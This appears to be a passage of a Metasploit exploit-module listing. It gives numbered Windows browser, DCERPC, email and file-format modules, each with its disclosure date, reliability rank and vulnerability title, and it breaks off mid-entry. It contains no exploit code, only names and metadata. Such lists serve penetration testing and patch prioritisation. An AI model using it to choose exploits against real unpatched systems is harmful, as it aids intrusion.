Microsoft Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability + 1000 windows/browser/ms06_071_xml_core 2006-10-10 normal No MS06-071 Microsoft Internet Explorer XML Core Services HTTP Request Handling + 1001 windows/browser/ms07_017_ani_loadimage_chunksize 2007-03-28 great No Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) + 1002 windows/browser/ms08_041_snapshotviewer 2008-07-07 excellent No Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download + 1003 windows/browser/ms08_053_mediaencoder 2008-09-09 normal No Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow + 1004 windows/browser/ms08_070_visual_studio_msmask 2008-08-13 normal No Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow + 1005 windows/browser/ms08_078_xml_corruption 2008-12-07 normal No MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption + 1006 windows/browser/ms09_002_memory_corruption 2009-02-10 normal No MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption + 1007 windows/browser/ms09_043_owc_htmlurl 2009-08-11 normal No Microsoft OWC Spreadsheet HTMLURL Buffer Overflow + 1008 windows/browser/ms09_043_owc_msdso 2009-07-13 normal No Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption + 1009 windows/browser/ms09_072_style_object 2009-11-20 normal No MS09-072 Microsoft Internet Explorer Style getElementsByTagName Memory Corruption + 1010 windows/browser/ms10_002_aurora 2010-01-14 normal No MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption + 1011 windows/browser/ms10_002_ie_object 2010-01-21 normal No MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free + 1012 windows/browser/ms10_018_ie_behaviors 2010-03-09 good No MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free + 1013 windows/browser/ms10_018_ie_tabular_activex 2010-03-09 good No MS10-018 Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption + 1014 windows/browser/ms10_022_ie_vbscript_winhlp32 2010-02-26 great No MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution + 1015 windows/browser/ms10_026_avi_nsamplespersec 2010-04-13 normal No MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow + 1016 windows/browser/ms10_042_helpctr_xss_cmd_exec 2010-06-09 excellent No Microsoft Help Center XSS and Command Execution + 1017 windows/browser/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent No Microsoft Windows Shell LNK Code Execution + 1018 windows/browser/ms10_090_ie_css_clip 2010-11-03 good No MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption + 1019 windows/browser/ms11_003_ie_css_import 2010-11-29 good No MS11-003 Microsoft Internet Explorer CSS Recursive Import Use After Free + 1020 windows/browser/ms11_050_mshtml_cobjectelement 2011-06-16 normal No MS11-050 IE mshtml!CObjectElement Use After Free + 1021 windows/browser/ms11_081_option 2012-10-11 normal No MS11-081 Microsoft Internet Explorer Option Element Use-After-Free + 1022 windows/browser/ms11_093_ole32 2011-12-13 normal No MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution + 1023 windows/browser/ms12_004_midi 2012-01-10 normal No MS12-004 midiOutPlayNextPolyEvent Heap Overflow + 1024 windows/browser/ms12_037_ie_colspan 2012-06-12 normal No MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow + 1025 windows/browser/ms12_037_same_id 2012-06-12 normal No MS12-037 Microsoft Internet Explorer Same ID Property Deleted Object Handling Memory Corruption + 1026 windows/browser/ms13_009_ie_slayoutrun_uaf 2013-02-13 average No MS13-009 Microsoft Internet Explorer SLayoutRun Use-After-Free + 1027 windows/browser/ms13_022_silverlight_script_object 2013-03-12 normal No MS13-022 Microsoft Silverlight ScriptObject Unsafe Memory Access + 1028 windows/browser/ms13_037_svg_dashstyle 2013-03-06 normal No MS13-037 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow + 1029 windows/browser/ms13_055_canchor 2013-07-09 normal No MS13-055 Microsoft Internet Explorer CAnchorElement Use-After-Free + 1030 windows/browser/ms13_059_cflatmarkuppointer 2013-06-27 normal No MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free + 1031 windows/browser/ms13_069_caret 2013-09-10 normal No MS13-069 Microsoft Internet Explorer CCaret Use-After-Free + 1032 windows/browser/ms13_080_cdisplaypointer 2013-10-08 normal No MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free + 1033 windows/browser/ms13_090_cardspacesigninhelper 2013-11-08 normal No MS13-090 CardSpaceClaimCollection ActiveX Integer Underflow + 1034 windows/browser/ms14_012_cmarkup_uaf 2014-02-13 normal No MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free + 1035 windows/browser/ms14_012_textrange 2014-03-11 normal No MS14-012 Microsoft Internet Explorer TextRange Use-After-Free + 1036 windows/browser/ms14_064_ole_code_execution 2014-11-13 good No MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution + 1037 windows/browser/ms16_051_vbscript 2016-05-10 normal No Internet Explorer 11 VBScript Engine Memory Corruption + 1038 windows/browser/msvidctl_mpeg2 2009-07-05 normal No Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption + 1039 windows/browser/mswhale_checkforupdates 2009-04-15 normal No Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow + 1040 windows/browser/msxml_get_definition_code_exec 2012-06-12 good No MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption + 1041 windows/browser/nctaudiofile2_setformatlikesample 2007-01-24 normal No NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow + 1042 windows/browser/nis2004_antispam 2004-03-19 normal No Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow + 1043 windows/browser/nis2004_get 2007-05-16 normal No Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow + 1044 windows/browser/notes_handler_cmdinject 2012-06-18 excellent No IBM Lotus Notes Client URL Handler Command Injection + 1045 windows/browser/novell_groupwise_gwcls1_actvx 2013-01-30 normal No Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution + 1046 windows/browser/novelliprint_callbackurl 2010-08-20 normal No Novell iPrint Client ActiveX Control call-back-url Buffer Overflow + 1047 windows/browser/novelliprint_datetime 2009-12-08 great No Novell iPrint Client ActiveX Control Date/Time Buffer Overflow + 1048 windows/browser/novelliprint_executerequest 2008-02-22 normal No Novell iPrint Client ActiveX Control ExecuteRequest Buffer Overflow + 1049 windows/browser/novelliprint_executerequest_dbg 2010-08-04 normal No Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow + 1050 windows/browser/novelliprint_getdriversettings 2008-06-16 normal No Novell iPrint Client ActiveX Control Buffer Overflow + 1051 windows/browser/novelliprint_getdriversettings_2 2010-11-15 normal No Novell iPrint Client ActiveX Control Buffer Overflow + 1052 windows/browser/novelliprint_target_frame 2009-12-08 great No Novell iPrint Client ActiveX Control target-frame Buffer Overflow + 1053 windows/browser/ntr_activex_check_bof 2012-01-11 normal No NTR ActiveX Control Check() Method Buffer Overflow + 1054 windows/browser/ntr_activex_stopmodule 2012-01-11 normal No NTR ActiveX Control StopModule() Remote Code Execution + 1055 windows/browser/oracle_autovue_setmarkupmode 2012-04-18 normal No Oracle AutoVue ActiveX Control SetMarkupMode Buffer Overflow + 1056 windows/browser/oracle_dc_submittoexpress 2009-08-28 normal No Oracle Document Capture 10g ActiveX Control Buffer Overflow + 1057 windows/browser/oracle_webcenter_checkoutandopen 2013-04-16 excellent No Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution + 1058 windows/browser/orbit_connecting 2009-02-03 normal No Orbit Downloader Connecting Log Creation Buffer Overflow + 1059 windows/browser/ovftool_format_string 2012-11-08 normal No VMWare OVF Tools Format String Vulnerability + 1060 windows/browser/pcvue_func 2011-10-05 average No PcVue 10.0 SV.UIGrdCtrl.1 'LoadObject()/SaveObject()' Trusted DWORD Vulnerability + 1061 windows/browser/persits_xupload_traversal 2009-09-29 excellent No Persits XUpload ActiveX MakeHttpRequest Directory Traversal + 1062 windows/browser/quickr_qp2_bof 2012-05-23 normal No IBM Lotus QuickR qp2 ActiveX Buffer Overflow + 1063 windows/browser/real_arcade_installerdlg 2011-04-03 normal No Real Networks Arcade Games StubbyUtil.ProcessMgr ActiveX Arbitrary Code Execution + 1064 windows/browser/realplayer_cdda_uri 2010-11-15 normal No RealNetworks RealPlayer CDDA URI Initialization Vulnerability + 1065 windows/browser/realplayer_console 2008-03-08 normal No RealPlayer rmoc3260.dll ActiveX Control Heap Corruption + 1066 windows/browser/realplayer_import 2007-10-18 normal No RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow + 1067 windows/browser/realplayer_qcp 2011-08-16 average No RealNetworks Realplayer QCP Parsing Heap Overflow + 1068 windows/browser/realplayer_smil 2005-03-01 normal No RealNetworks RealPlayer SMIL Buffer Overflow + 1069 windows/browser/roxio_cineplayer 2007-04-11 normal No Roxio CinePlayer ActiveX Control Buffer Overflow + 1070 windows/browser/safari_xslt_output 2011-07-20 excellent No Apple Safari Webkit libxslt Arbitrary File Creation + 1071 windows/browser/samsung_neti_wiewer_backuptoavi_bof 2012-04-21 normal No Samsung NET-i Viewer Multiple ActiveX BackupToAvi() Remote Overflow + 1072 windows/browser/samsung_security_manager_put 2016-08-05 excellent No Samsung Security Manager 1.4 ActiveMQ Broker Service PUT Method Remote Code Execution + 1073 windows/browser/sapgui_saveviewtosessionfile 2009-03-31 normal No SAP AG SAPgui EAI WebViewer3D Buffer Overflow + 1074 windows/browser/siemens_solid_edge_selistctrlx 2013-05-26 normal No Siemens Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution + 1075 windows/browser/softartisans_getdrivename 2008-08-25 normal No SoftArtisans XFile FileManager ActiveX Control Buffer Overflow + 1076 windows/browser/sonicwall_addrouteentry 2007-11-01 normal No SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow + 1077 windows/browser/symantec_altirisdeployment_downloadandinstall 2009-09-09 excellent No Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute + 1078 windows/browser/symantec_altirisdeployment_runcmd 2009-11-04 normal No Symantec Altiris Deployment Solution ActiveX Control Buffer Overflow + 1079 windows/browser/symantec_appstream_unsafe 2009-01-15 excellent No Symantec AppStream LaunchObj ActiveX Control Arbitrary File Download and Execute + 1080 windows/browser/symantec_backupexec_pvcalendar 2008-02-28 normal No Symantec BackupExec Calendar Control Buffer Overflow + 1081 windows/browser/symantec_consoleutilities_browseandsavefile 2009-11-02 normal No Symantec ConsoleUtilities ActiveX Control Buffer Overflow + 1082 windows/browser/synactis_connecttosynactis_bof 2013-05-30 normal No Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow + 1083 windows/browser/systemrequirementslab_unsafe 2008-10-16 excellent No Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method + 1084 windows/browser/teechart_pro 2011-08-11 normal No TeeChart Professional ActiveX Control Trusted Integer Dereference + 1085 windows/browser/tom_sawyer_tsgetx71ex552 2011-05-03 normal No Tom Sawyer Software GET Extension Factory Remote Code Execution + 1086 windows/browser/trendmicro_extsetowner 2010-08-25 normal No Trend Micro Internet Security Pro 2010 ActiveX extSetOwner() Remote Code Execution + 1087 windows/browser/trendmicro_officescan 2007-02-12 normal No Trend Micro OfficeScan Client ActiveX Control Buffer Overflow + 1088 windows/browser/tumbleweed_filetransfer 2008-04-07 great No Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow + 1089 windows/browser/ubisoft_uplay_cmd_exec 2012-07-29 normal No Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution + 1090 windows/browser/ultramjcam_openfiledig_bof 2012-03-28 normal No TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow + 1091 windows/browser/ultraoffice_httpupload 2008-08-27 good No Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow + 1092 windows/browser/verypdf_pdfview 2008-06-16 normal No VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow + 1093 windows/browser/viscom_movieplayer_drawtext 2010-01-12 normal No Viscom Software Movie Player Pro SDK ActiveX 6.8 + 1094 windows/browser/vlc_amv 2011-03-23 good No VLC AMV Dangling Pointer Vulnerability + 1095 windows/browser/vlc_mms_bof 2012-03-15 normal No VLC MMS Stream Handling Buffer Overflow + 1096 windows/browser/webdav_dll_hijacker 2010-08-18 manual No WebDAV Application DLL Hijacker + 1097 windows/browser/webex_ucf_newobject 2008-08-06 good No WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow + 1098 windows/browser/wellintech_kingscada_kxclientdownload 2014-01-14 good No KingScada kxClientDownload.ocx ActiveX Remote Code Execution + 1099 windows/browser/winamp_playlist_unc 2006-01-29 great No Winamp Playlist UNC Path Computer Name Overflow + 1100 windows/browser/winamp_ultravox 2008-01-18 normal No Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow + 1101 windows/browser/windvd7_applicationtype 2007-03-20 normal No WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow + 1102 windows/browser/winzip_fileview 2007-11-02 normal No WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow + 1103 windows/browser/wmi_admintools 2010-12-21 great No Microsoft WMI Administration Tools ActiveX Buffer Overflow + 1104 windows/browser/x360_video_player_set_text_bof 2015-01-30 normal No X360 VideoPlayer ActiveX Control Buffer Overflow + 1105 windows/browser/xmplay_asx 2006-11-21 good No XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow + 1106 windows/browser/yahoomessenger_fvcom 2007-08-30 normal No Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow + 1107 windows/browser/yahoomessenger_server 2007-06-05 good No Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow + 1108 windows/browser/zenturiprogramchecker_unsafe 2007-05-29 excellent No Zenturi ProgramChecker ActiveX Control Arbitrary File Download + 1109 windows/browser/zenworks_helplauncher_exec 2011-10-19 normal No AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution + 1110 windows/dcerpc/ms03_026_dcom 2003-07-16 great No MS03-026 Microsoft RPC DCOM Interface Overflow + 1111 windows/dcerpc/ms05_017_msmq 2005-04-12 good No MS05-017 Microsoft Message Queueing Service Path Overflow + 1112 windows/dcerpc/ms07_029_msdns_zonename 2007-04-12 great No MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP) + 1113 windows/dcerpc/ms07_065_msmq 2007-12-11 good No MS07-065 Microsoft Message Queueing Service DNS Name Path Overflow + 1114 windows/email/ms07_017_ani_loadimage_chunksize 2007-03-28 great No Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) + 1115 windows/email/ms10_045_outlook_ref_only 2010-06-01 excellent No Outlook ATTACH_BY_REF_ONLY File Execution + 1116 windows/email/ms10_045_outlook_ref_resolve 2010-06-01 excellent No Outlook ATTACH_BY_REF_RESOLVE File Execution + 1117 windows/emc/alphastor_agent 2008-05-27 great No EMC AlphaStor Agent Buffer Overflow + 1118 windows/emc/alphastor_device_manager_exec 2013-01-18 excellent Yes EMC AlphaStor Device Manager Opcode 0x75 Command Injection + 1119 windows/emc/networker_format_string 2012-08-29 normal No EMC Networker Format String + 1120 windows/emc/replication_manager_exec 2011-02-07 great No EMC Replication Manager Command Execution + 1121 windows/fileformat/a_pdf_wav_to_mp3 2010-08-17 normal No A-PDF WAV to MP3 v1.0.0 Buffer Overflow + 1122 windows/fileformat/abbs_amp_lst 2013-06-30 normal No ABBS Audio Media Player .LST Buffer Overflow + 1123 windows/fileformat/acdsee_fotoslate_string 2011-09-12 good No ACDSee FotoSlate PLP File id Parameter Overflow + 1124 windows/fileformat/acdsee_xpm 2007-11-23 good No ACDSee XPM File Section Buffer Overflow + 1125 windows/fileformat/actfax_import_users_bof 2012-08-28 normal No ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow + 1126 windows/fileformat/activepdf_webgrabber 2008-08-26 low No activePDF WebGrabber ActiveX Control Buffer Overflow + 1127 windows/fileformat/adobe_collectemailinfo 2008-02-08 good No Adobe Collab.collectEmailInfo() Buffer Overflow + 1128 windows/fileformat/adobe_cooltype_sing 2010-09-07 great No Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow + 1129 windows/fileformat/adobe_flashplayer_button 2010-10-28 normal No Adobe Flash Player "Button" Remote Code Execution + 1130 windows/fileformat/adobe_flashplayer_newfunction 2010-06-04 normal No Adobe Flash Player "newfunction" Invalid Pointer Use + 1131 windows/fileformat/adobe_flatedecode_predictor02 2009-10-08 good No Adobe FlateDecode Stream Predictor 02 Integer Overflow + 1132 windows/fileformat/adobe_geticon 2009-03-24 good No Adobe Collab.getIcon() Buffer Overflow + 1133 windows/fileformat/adobe_illustrator_v14_eps 2009-12-03 great No Adobe Illustrator CS4 v14.0.0 + 1134 windows/fileformat/adobe_jbig2decode 2009-02-19 good No Adobe JBIG2Decode Memory Corruption + 1135 windows/fileformat/adobe_libtiff 2010-02-16 good No Adobe Acrobat Bundled LibTIFF Integer Overflow + 1136 windows/fileformat/adobe_media_newplayer 2009-12-14 good No Adobe Doc.media.newPlayer Use After Free Vulnerability + 1137 windows/fileformat/adobe_pdf_embedded_exe 2010-03-29 excellent No Adobe PDF Embedded EXE Social Engineering + 1138 windows/fileformat/adobe_pdf_embedded_exe_nojs 2010-03-29 excellent No Adobe PDF Escape EXE Social Engineering (No JavaScript) + 1139 windows/fileformat/adobe_reader_u3d 2011-12-06 average No Adobe Reader U3D Memory Corruption Vulnerability + 1140 windows/fileformat/adobe_toolbutton 2013-08-08 normal No Adobe Reader ToolButton Use After Free + 1141 windows/fileformat/adobe_u3d_meshdecl 2009-10-13 good No Adobe U3D CLODProgressiveMeshDeclaration Array Overrun + 1142 windows/fileformat/adobe_utilprintf 2008-02-08 good No Adobe util.printf() Buffer Overflow + 1143 windows/fileformat/allplayer_m3u_bof 2013-10-09 normal No ALLPlayer M3U Buffer Overflow + 1144 windows/fileformat/altap_salamander_pdb 2007-06-19 good No Altap Salamander 2.5 PE Viewer Buffer Overflow + 1145 windows/fileformat/aol_desktop_linktag 2011-01-31 normal No AOL Desktop 9.6 RTX Buffer Overflow + 1146 windows/fileformat/aol_phobos_bof 2010-01-20 average No AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow + 1147 windows/fileformat/apple_quicktime_pnsize 2011-08-08 good No Apple QuickTime PICT PnSize Buffer Overflow + 1148 windows/fileformat/apple_quicktime_rdrf 2013-05-22 normal No Apple Quicktime 7 Invalid Atom Length Buffer Overflow + 1149 windows/fileformat/apple_quicktime_texml 2012-05-15 normal No Apple QuickTime TeXML Style Element Stack Buffer Overflow + 1150 windows/fileformat/audio_coder_m3u 2013-05-01 normal No AudioCoder .M3U Buffer Overflow + 1151 windows/fileformat/audio_wkstn_pls 2009-12-08 good No Audio Workstation 6.4.2.4.3 pls Buffer Overflow + 1152 windows/fileformat/audiotran_pls 2010-01-09 good No Audiotran 1.4.1 (PLS File) Stack Buffer Overflow + 1153 windows/fileformat/audiotran_pls_1424 2010-09-09 good No Audiotran PLS File Stack Buffer Overflow + 1154 windows/fileformat/aviosoft_plf_buf 2011-11-09 good No Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow + 1155 windows/fileformat/bacnet_csv 2010-09-16 good No BACnet OPC Client Buffer Overflow + 1156 windows/fileformat/beetel_netconfig_ini_bof 2013-10-12 normal No Beetel Connection Manager NetConfig.ini Buffer Overflow + 1157 windows/fileformat/blazedvd_hdtv_bof 2012-04-03 normal No BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability + 1158 windows/fileformat/blazedvd_plf 2009-08-03 good No BlazeDVD 6.1 PLF Buffer Overflow + 1159 windows/fileformat/boxoft_wav_to_mp3 2015-08-31 normal No Boxoft WAV to MP3 Converter v1.1 Buffer Overflow + 1160 windows/fileformat/bpftp_client_bps_bof 2014-07-24 normal No BulletProof FTP Client BPS Buffer Overflow + 1161 windows/fileformat/bsplayer_m3u 2010-01-07 normal No BS.Player 2.57 Buffer Overflow (Unicode SEH) + 1162 windows/fileformat/ca_cab 2007-06-05 good No CA Antivirus Engine CAB Buffer Overflow + 1163 windows/fileformat/cain_abel_4918_rdp 2008-11-30 good No Cain and Abel RDP Buffer Overflow + 1164 windows/fileformat/ccmplayer_m3u_bof 2011-11-30 good No CCMPlayer 1.5 m3u Playlist Stack Based Buffer Overflow + 1165 windows/fileformat/chasys_draw_ies_bmp_bof 2013-07-26 normal No Chasys Draw IES Buffer Overflow + 1166 windows/fileformat/coolpdf_image_stream_bof 2013-01-18 normal No Cool PDF Image Stream Buffer Overflow + 1167 windows/fileformat/corelpdf_fusion_bof 2013-07-08 normal No Corel PDF Fusion Stack Buffer Overflow + 1168 windows/fileformat/csound_getnum_bof 2012-02-23 normal No Csound hetro File Handling Stack Buffer Overflow + 1169 windows/fileformat/cutezip_bof 2011-02-12 normal No GlobalSCAPE CuteZIP Stack Buffer Overflow + 1170 windows/fileformat/cve_2017_8464_lnk_rce 2017-06-13 excellent No LNK Code Execution Vulnerability + 1171 windows/fileformat/cyberlink_lpp_bof 2017-09-23 normal No CyberLink LabelPrint 2.5 Stack Buffer Overflow + 1172 windows/fileformat/cyberlink_p2g_bof 2011-09-12 great No CyberLink Power2Go name Attribute (p2g) Stack Buffer Overflow Exploit + 1173 windows/fileformat/cytel_studio_cy3 2011-10-02 good No Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow + 1174 windows/fileformat/deepburner_path 2006-12-19 great No AstonSoft DeepBurner (DBR File) Path Buffer Overflow + 1175 windows/fileformat/destinymediaplayer16 2009-01-03 good No Destiny Media Player 1.61 PLS M3U Buffer Overflow + 1176 windows/fileformat/digital_music_pad_pls 2010-09-17 normal No Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow + 1177 windows/fileformat/djstudio_pls_bof 2009-12-30 normal No DJ Studio Pro 5.1 .pls Stack Buffer Overflow + 1178 windows/fileformat/djvu_imageurl 2008-10-30 low No DjVu DjVu_ActiveX_MSOffice.dll ActiveX ComponentBuffer Overflow + 1179 windows/fileformat/dupscout_xml 2017-03-29 normal No Dup Scout Enterprise v10.4.16 - Import Command Buffer Overflow + 1180 windows/fileformat/dvdx_plf_bof 2007-06-02 normal No DVD X Player 5.5 .plf PlayList Buffer Overflow + 1181 windows/fileformat/easycdda_pls_bof 2010-06-07 normal No Easy CD-DA Recorder PLS Buffer Overflow + 1182 windows/fileformat/emc_appextender_keyworks 2009-09-29 average No EMC ApplicationXtender (KeyWorks) ActiveX Control Buffer Overflow + 1183 windows/fileformat/erdas_er_viewer_bof 2013-04-23 normal No ERS Viewer 2011 ERS File Handling Buffer Overflow + 1184 windows/fileformat/erdas_er_viewer_rf_report_error 2013-05-23 normal No ERS Viewer 2013 ERS File Handling Buffer Overflow + 1185 windows/fileformat/esignal_styletemplate_bof 2011-09-06 normal No eSignal and eSignal Pro File Parsing Buffer Overflow in QUO + 1186 windows/fileformat/etrust_pestscan 2009-11-02 average No CA eTrust PestPatrol ActiveX Control Buffer Overflow + 1187 windows/fileformat/ezip_wizard_bof 2009-03-09 good No eZip Wizard 3.0 Stack Buffer Overflow + 1188 windows/fileformat/fatplayer_wav 2010-10-18 normal No Fat Player Media Player 0.6b0 Buffer Overflow + 1189 windows/fileformat/fdm_torrent 2009-02-02 good No Free Download Manager Torrent Parsing Buffer Overflow + 1190 windows/fileformat/feeddemon_opml 2009-02-09 great No FeedDemon Stack Buffer Overflow + 1191 windows/fileformat/foxit_reader_filewrite 2011-03-05 normal No Foxit PDF Reader 4.2 Javascript File Write + 1192 windows/fileformat/foxit_reader_launch 2009-03-09 good No Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow + 1193 windows/fileformat/foxit_reader_uaf 2018-04-20 normal No Foxit PDF Reader Pointer Overwrite UAF + 1194 windows/fileformat/foxit_title_bof 2010-11-13 great No Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow + 1195 windows/fileformat/free_mp3_ripper_wav 2011-08-27 great No Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow + 1196 windows/fileformat/galan_fileformat_bof 2009-12-07 normal No gAlan 0.2.1 Buffer Overflow + 1197 windows/fileformat/gsm_sim 2010-07-07 normal No GSM SIM Editor 5.15 Buffer Overflow + 1198 windows/fileformat/gta_samp 2011-09-18 normal No GTA SA-MP server.cfg Buffer Overflow + 1199 windows/fileformat/hhw_hhp_compiledfile_bof 2006-02-06 good No HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow + 1200 windows/fileformat/hhw_hhp_contentfile_bof 2006-02-06 good No HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow + 1201 windows/fileformat/hhw_hhp_indexfile_bof 2009-01-17 good No HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow + 1202 windows/fileformat/homm3_h3m 2015-07-29 normal No Heroes of Might and Magic III .h3m Map file Buffer Overflow + 1203 windows/fileformat/ht_mp3player_ht3_bof 2009-06-29 good No HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow + 1204 windows/fileformat/ibm_forms_viewer_fontname 2013-12-05 normal No IBM Forms Viewer Unicode Buffer Overflow + 1205 windows/fileformat/ibm_pcm_ws 2012-02-28 great No IBM Personal Communications iSeries Access WorkStation 5.9 Profile + 1206 windows/fileformat/icofx_bof 2013-12-10 normal No IcoFX Stack Buffer Overflow + 1207 windows/fileformat/ideal_migration_ipj 2009-12-05 great No PointDev IDEAL Migration Buffer Overflow + 1208 windows/fileformat/iftp_schedule_bof 2014-11-06 normal No i-FTP Schedule Buffer Overflow + 1209 windows/fileformat/irfanview_jpeg2000_bof 2012-01-16 normal No Irfanview JPEG2000 jp2 Stack Buffer Overflow + 1210 windows/fileformat/ispvm_xcf_ispxcf 2012-05-16 normal No Lattice Semiconductor ispVM System XCF File Handling Overflow + 1211 windows/fileformat/kingview_kingmess_kvl 2012-11-20 normal No KingView Log File Parsing Buffer Overflow + 1212 windows/fileformat/lattice_pac_bof 2012-05-16 normal No Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow + 1213 windows/fileformat/lotusnotes_lzh 2011-05-24 good No Lotus Notes 8.0.x - 8.5.2 FP2 - Autonomy Keyview (.lzh Attachment) + 1214 windows/fileformat/magix_musikmaker_16_mmm 2011-04-26 good No Magix Musik Maker 16 .mmm Stack Buffer Overflow + 1215 windows/fileformat/mcafee_hercules_deletesnapshot 2008-08-04 low No McAfee Remediation Client ActiveX Control Buffer Overflow + 1216 windows/fileformat/mcafee_showreport_exec 2012-01-12 normal No McAfee SaaS MyCioScan ShowReport Remote Command Execution + 1217 windows/fileformat/mediacoder_m3u 2013-06-24 normal No MediaCoder .M3U Buffer Overflow + 1218 windows/fileformat/mediajukebox 2009-07-01 normal No Media Jukebox 8.0.400 Buffer Overflow (SEH) + 1219 windows/fileformat/microp_mppl 2010-08-23 great No MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow + 1220 windows/fileformat/microsoft_windows_contact 2019-01-17 normal No Microsoft Windows Contact File Format Arbitary Code Execution + 1221 windows/fileformat/millenium_mp3_pls 2009-07-30 great No Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow + 1222 windows/fileformat/mini_stream_pls_bof 2010-07-16 great No Mini-Stream RM-MP3 Converter v3.1.2.1 PLS File Stack Buffer Overflow + 1223 windows/fileformat/mjm_coreplayer2011_s3m 2011-04-30 good No MJM Core Player 2011 .s3m Stack Buffer Overflow + 1224 windows/fileformat/mjm_quickplayer_s3m 2011-04-30 good No MJM QuickPlayer 1.00 Beta 60a / QuickPlayer 2010 .s3m Stack Buffer Overflow + 1225 windows/fileformat/moxa_mediadbplayback 2010-10-19 average No MOXA MediaDBPlayback ActiveX Control Buffer Overflow + 1226 windows/fileformat/mplayer_m3u_bof 2011-03-19 average No MPlayer Lite M3U Buffer Overflow + 1227 windows/fileformat/mplayer_sami_bof 2011-05-19 normal No MPlayer SAMI Subtitle File Buffer Overflow + 1228 windows/fileformat/ms09_067_excel_featheader 2009-11-10 good No MS09-067 Microsoft Excel Malformed FEATHEADER Record Vulnerability + 1229 windows/fileformat/ms10_004_textbytesatom 2010-02-09 good No MS10-004 Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow + 1230 windows/fileformat/ms10_038_excel_obj_bof 2010-06-08 normal No MS11-038 Microsoft Office Excel Malformed OBJ Record Handling Overflow + 1231 windows/fileformat/ms10_087_rtf_pfragments_bof 2010-11-09 great No MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format) + 1232 windows/fileformat/ms11_006_createsizeddibsection 2010-12-15 great No MS11-006 Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow + 1233 windows/fileformat/ms11_021_xlb_bof 2011-08-09 normal No MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow + 1234 windows/fileformat/ms12_005 2012-01-10 excellent No MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability + 1235 windows/fileformat/ms12_027_mscomctl_bof 2012-04-10 average No MS12-027 MSCOMCTL ActiveX Buffer Overflow + 1236 windows/fileformat/ms13_071_theme 2013-09-10 excellent No MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution + 1237 windows/fileformat/ms14_017_rtf 2014-04-01 normal No MS14-017 Microsoft Word RTF Object Confusion + 1238 windows/fileformat/ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager Code Execution + 1239 windows/fileformat/ms14_064_packager_python 2014-11-12 excellent No MS14-064 Microsoft Windows 